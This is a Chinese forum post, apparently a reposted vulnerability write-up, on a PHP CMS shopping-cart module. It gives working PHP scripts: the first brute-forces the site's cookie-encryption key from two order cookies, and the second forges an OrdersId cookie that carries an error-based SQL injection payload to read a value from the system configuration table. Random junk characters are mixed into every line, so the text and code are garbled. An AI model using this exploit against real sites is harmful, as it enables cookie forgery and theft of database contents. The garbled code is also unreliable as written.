www.xxx.com/plus/search.php?keyword=
7 _' h3 `/ N0 H5 c+ F% @, x在 include/shopcar.class.php中! b. ^# V$ @$ i, a" H! ]/ i" x3 b2 H
先看一下这个shopcar类是如何生成cookie的
# Y+ o0 f- `$ t! Y239 function saveCookie($key,$value); `, j3 c* c9 L5 p9 `% e" G. m
240 {9 n7 }4 o1 f( N, h. m: k% p
241 if(is_array($value))
, c4 F% D4 |6 o8 P- @, R242 {
3 m, f/ j% W' Y" J2 L' e243 $value = $this->enCrypt($this->enCode($value));4 P: _. ~! Y% g
244 }- k4 `, \" Q8 ?* E
245 else
, J7 o/ `* I7 x M/ L246 {% z$ z5 x7 I" r- L; H
247 $value = $this->enCrypt($value);! V7 E: q. B1 q( B4 S: u
248 }. s. ]2 n) y8 l+ N, i1 m" Z8 T
249 setcookie($key,$value,time()+36000,’/');$ i8 j; N" d- m4 T
250 }
* u% L* ?, L9 j简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
# C2 A; T: L6 x5 x6 }& @186 function enCrypt($txt)% K$ k1 d8 b) W1 O
187 {
" `. {* f+ E' m; n* h( G" k/ h188 srand((double)microtime() * 1000000);$ P1 `/ n6 q2 W2 D2 }: }2 F
189 $encrypt_key = md5(rand(0, 32000));& O# w9 j: p# W
190 $ctr = 0;; G0 J* D4 }. t! s/ a
191 $tmp = ”;6 u: J! Y8 C( e c/ C2 R7 ?
192 for($i = 0; $i < strlen($txt); $i++)
, x' ^! \( z: C& [6 O+ p193 {3 |0 W) z# L8 a" X$ P& O7 [" S: |
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;8 Q1 q6 o( J% ~- ^+ D
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
5 ]5 i# |) P: S0 }196 }
: E' J( U3 z1 O/ Q: H( B8 a197 return base64_encode($this->setKey($tmp));: E7 b) k9 J- d3 s/ }0 t2 }
198 }* M3 {- M2 w) i5 ^% Z; @% Z
213 function setKey($txt)
. K) A) S4 c# f214 {
( p4 A* m1 m/ n" _, F* l215 global $cfg_cookie_encode;. ?6 \, x- b; x1 c
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));2 H' E% y& Y! s7 n$ G$ O% g
217 $ctr = 0; ] M' J- @" o% T
218 $tmp = ”;
0 u3 b! U! e( i/ |1 E+ u1 X219 for($i = 0; $i < strlen($txt); $i++)
) N0 v9 e( S; U V# M% p* w220 {& l7 N# ?2 o! U6 {
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
4 p8 X, r+ Q8 a. H1 g+ p& O222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
9 g$ H$ f( u4 }5 b K9 F223 }& P$ P4 t( x, p4 Z
224 return $tmp;
- O; l( w8 E9 v) K. ~; s) O' @+ g225 }0 r. w* s& J5 E+ s- X1 y
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的! v$ h% T2 ? @# j2 @
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。; e! t+ c. H; @# s. X/ ?: c+ l, R2 C
具体代码如下:( q- l* ]8 h* E' I
<?php
' m' Z# X' d7 p: \+ {- s$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here2 Z8 G3 L B9 _5 E) j8 m' h
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here) \0 Y( k* Z, S
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here( }# w+ B) E7 z; @1 r$ r# L
function reStrCode($code,$string)( ~! r: m" B7 r7 P4 ?5 e) X0 p W
{
k+ r% x$ H- d! H) ~$code = base64_decode($code);2 f- q9 B! h9 s' ^" Y
$key = “”;4 P! b* k4 ?& U$ y% q* j5 j
for($i=0 ; $i<32 ; $i++)6 u4 D/ C. Q4 [" V% A% \9 b: X
{- Y! J; F) V1 |5 J' J; V, U4 X
$key .= $string[$i] ^ $code[$i];$ U- h0 m0 S& _
}
3 d. ^1 n- _9 @: breturn $key;
; j# r, x' k: ]6 P. l$ c}
+ [8 _2 A) l8 {# X9 U2 D9 j% k( ffunction getKeys($cookie,$plantxt)
: o7 `- i* i6 y+ p8 N& ]{6 p" ?' S' }5 t3 @+ D* Y* A
$tmp = $cookie;
, p! b9 }5 e* ^* q2 k$results = array();
/ a0 y, X- _4 T/ w6 N, Efor($j=0 ; $j < 32000; $j++)
2 @- i7 k9 w) [{2 L/ K- `9 K( m( H" g, ^! c
) ~+ M4 w+ K* D) G2 S8 Y) n$ h
$txt = $plantxt;4 a' U6 D8 Y* e9 ?4 d/ F0 Y6 ~
$ctr = 0;
+ L9 m+ u% U* Y J( v$tmp = ”;
& b# |9 r2 R2 ?# V3 n& M" N2 o$encrypt_key = md5($j);
% e G( O, t5 ?& `$ Zfor($i =0; $i < strlen($txt); $i ++)% D3 z! p+ h( f' J1 e$ q. L
{
3 c5 U: d' }) N) A) b& f, G. k$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;- F- Z5 U- A5 r% s1 [5 a5 Y
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
+ R, K7 i" m! n. L}
3 ]. h( r0 W. ]( j+ {( A$string = $tmp;
9 y4 N* {6 r9 j+ M6 H5 N, I: ?$code = $cookie;
1 [- e9 H/ \$ L0 v5 Z$result = reStrCode($code,$string);
5 l2 G, W) }- H) Y" @& {* l/ bif(eregi(‘^[a-z0-9]+$’,$result))
5 C0 z; R0 _6 ]: G{, _. f2 `" O+ Y: ~; X+ z
echo $result.”\n”;
& N) `& E+ x) m, |$results[] = $result;' _2 J3 B5 R# {1 t
}3 _" F1 G2 |0 k6 j# Q
}
; w) p. ]. {* g! @/ }return $results;1 O- F: ?# ?. w N. Z1 N8 G- N8 r5 V
}
% T& A' L, E0 w, o, j$results1 = getKeys($cookie1,$plantxt);
1 A& P; u. o! D8 z$results2 = getKeys($cookie2,$plantxt);. `: ]/ E, u' f8 Y3 K
print “\n——————–real key————————–\n”;
9 h8 V) U6 K( O8 v7 lforeach($results1 as $test1)+ `3 x0 s2 J# D/ z; x' P+ A/ G
{9 U0 t/ \; B9 s; y) b* F) {$ A8 ^
foreach($results2 as $test2)
7 l9 d& x* g4 c/ R! \9 T{
% a1 `6 V$ n" o) N9 [- hif($test1 == $test2)
9 k8 N) \9 ^' b/ t0 o* e5 q( V$ G{
+ \: K( |4 @: L% u: j( E) `( E5 V! becho $test1.”\n”;
( h/ R3 O3 e1 E}
9 Q- ?0 d9 v: g' a}
, W+ v1 J& X: n}
% ]2 M3 I5 p7 s- Z" d% E?>
' Q) T' ?9 ~ u- B( e1 J! y: u4 ncookie1 和 cookie2 是我下了两次订单后分别生成的cookie,9 v3 n4 u0 S, c
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1' f4 `" v1 j0 y+ [
然后推算出md5(strtolower($cfg_cookie_encode))1 W& L3 ~7 C8 _8 l" \
得到这个key之后,我们就可以构造任意购物车的cookie
, |( G I( i/ `5 p- w9 |6 {3 t接着看2 ^* K8 q* E) g. @
20 class MemberShops
$ z0 k7 L* @) D21 {
: U, u$ G7 q( u, r5 Q% L% C5 a22 var $OrdersId;( x2 R: \5 M3 H. j* N3 ]2 Q7 g5 `+ k
23 var $productsId;
# o7 v$ D5 f' ^$ V24
8 u2 s$ ~) W9 b* f8 f! E$ m25 function __construct()
) }; x# k2 ^6 d0 D: \26 {" F2 m7 W/ Y2 I( p$ q% g
27 $this->OrdersId = $this->getCookie(“OrdersId”);
) W8 |8 j( W7 v" [. K28 if(empty($this->OrdersId))
8 K# g1 ?( R2 W: R29 {
' R( y5 D8 V8 h: b30 $this->OrdersId = $this->MakeOrders();' C- S, ^% N) r/ w
31 }
* A6 l, |8 `% N/ I8 j! Q* N7 B32 }! Z7 s5 N3 S, W" C3 T: | ^
发现OrderId是从cookie里面获取的
0 Q1 N- a) r. f然后
. P6 U# E3 O9 o/plus/carbuyaction.php中的/ C ~6 E, o8 Q3 d' I! k. f. D ?
29 $cart = new MemberShops();
6 o, |5 e. }& V: s' Q6 A& }0 g. ]1 \39 $OrdersId = $cart->OrdersId; //本次记录的订单号
3 I( g& d0 P6 ?2 c4 J' a……* P/ V( S/ J: _; Y# Y
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
1 A/ ^2 o2 \5 ?/ b# B接着我们就可以注入了. A/ o r9 n# z2 v
通过利用下面代码生成cookie:0 _. {, z4 I) W! W( m7 B- C
<?php1 p# e9 j8 e6 A4 i% E F: z
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;5 \; f5 H& e/ M& _1 p* e
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here, o6 g9 d( {0 @$ Z$ W
function setKey($txt)' W* N4 }1 m4 X( T6 [( K) v
{
. J" h/ U' t) r' Jglobal $encrypt_key;1 g& e4 l9 W v' ^
$ctr = 0;" _) W2 d& @: X. M- j) A
$tmp = ”;
8 {) f& U5 l6 p1 rfor($i = 0; $i < strlen($txt); $i++)% [0 T" i' Y' u% X- V
{
, q; E3 M) Z/ N2 a0 i! R$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;# t. ]( ~ U! |0 j8 p: S
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];! Z8 k! M6 S, C9 `* T- P8 p
}
0 [7 O3 b/ t* o1 m! ~1 freturn $tmp;
4 |, x' a2 M2 W1 {4 H& B}* X: {: P% \5 N0 {% Y. I- x
function enCrypt($txt)$ O" \% G" a8 V: i
{
. X2 v% e; _) d8 csrand((double)microtime() * 1000000);5 ]. ~7 P- T+ B6 `# g
$encrypt_key = md5(rand(0, 32000));
, L3 J3 F! x7 p3 e$ctr = 0;
5 s# _! b6 b: l$ N, { g9 u$tmp = ”;# k% }- D( H7 f2 Y: E% S
for($i = 0; $i < strlen($txt); $i++)0 _8 m+ ^! v4 Y+ j* Y! Q
{. `+ E s) @$ W1 S1 K2 l
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
! F( N4 }$ X! X1 K& ^8 S- U& U$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);7 j, K6 V0 x8 S! G! h8 I4 l* d' T
}1 j g5 [% Y1 e5 m* }8 s/ z- l
return base64_encode(setKey($tmp));
/ Q$ D J0 F2 R' S; B}
l$ `9 L/ w( @1 R8 q* J1 Kfor($dest =0;$dest = enCrypt($txt);): [7 C: g+ Z2 E
{
: x5 S! t$ j; ?0 p- ]; N( k4 Xif(!strpos($dest,’+'))
& H% z. p& }4 V6 z8 n% x- x; S{
) W1 z, h+ I. _. L& r8 Dbreak;
2 H c! y: o$ L}
6 @" G. J4 j9 ]9 N}! t# J" Y& o( g1 {6 _
echo $dest.”\n”;
3 \7 l& ~8 R5 C/ \* ]' ]& E?>
+ x5 m! G; n4 |4 \0 A* U8 q S; {( s3 b9 \9 v& ?8 N
|
发表于 2013-2-13 23:58:29
收藏
支持
反对